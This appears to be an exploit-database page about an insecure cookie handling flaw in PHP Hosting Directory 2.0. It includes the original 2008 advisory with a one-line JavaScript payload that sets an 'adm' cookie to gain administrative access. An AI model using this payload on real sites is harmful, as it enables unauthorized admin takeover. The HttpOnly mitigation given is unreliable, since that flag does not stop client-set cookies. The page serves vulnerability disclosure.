header-logo
Suggest Exploit
vendor:
PHP Hosting Directory
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
384
CWE
Product Name: PHP Hosting Directory
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:jnshosts:php_hosting_directory
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP Hosting Directory 2.0 Insecure Cookie Handling Vulnerability

A vulnerability in PHP Hosting Directory 2.0 allows an attacker to set arbitrary cookies by using a malicious JavaScript code. The code can be used to set the 'adm' cookie to '1' and set the path to '/'. This can be used to gain administrative access to the application.

Mitigation:

Ensure that cookies are set with the 'HttpOnly' flag to prevent them from being accessed by malicious JavaScript code.
Source

Exploit-DB raw data:

# PHP Hosting Directory 2.0 Insecure Cookie Handling Vulnerability  
# Name Of Script : PHP Hosting Directory 2.0
# Download From : http://jnshosts.com/download/phphost_directory.zip
# Discoverd By :Stack
# Home : http://v4-team.com
---
exploit:
javascript:document.cookie = "adm=1; path=/"; document.cookie = "adm=1; path=/";

# milw0rm.com [2008-07-30]

Navigation

Suggest Exploit

Services By CQR